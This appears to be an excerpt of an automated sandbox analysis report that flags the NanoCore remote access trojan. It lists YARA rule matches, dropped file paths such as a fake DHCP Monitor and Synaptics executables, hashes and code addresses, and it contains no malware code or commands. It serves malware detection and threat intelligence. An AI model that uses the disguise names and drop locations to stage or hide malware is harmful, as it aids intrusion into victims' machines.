            Source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 0_2_00FCC0E4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 0_2_00FCE530
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 0_2_00FCE520
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004601F0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0046C7CC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0048C7F4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0044EA40
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00496E18
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_0046B1E4
            Source: C:\Users\user\Desktop\SYSTEM32.EXE | Code function: 7_2_00DA5FB9
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_015DC0E4
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_015DE530
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_015DE520
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B0E6B8
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B0C568
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B02628
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B0B190
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B02DB8
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B02DAB
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_05B0DBA0
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_06061268
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_06063B60
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_060633F0
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_06066F80
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Code function: 8_2_0606FB88
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_004601F0
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0046C7CC
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0048C7F4
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0044EA40
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00496E18
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0046B1E4
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_0045FCC8
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00453DA4
            Source: WINDOWS.EXE.6.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Section loaded: starttiledata.dll
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Section loaded: starttiledata.dll
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Section loaded: starttiledata.dll
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Section loaded: starttiledata.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: starttiledata.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exe | Section loaded: starttiledata.dll
            Source: y8kdmHi6x3.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
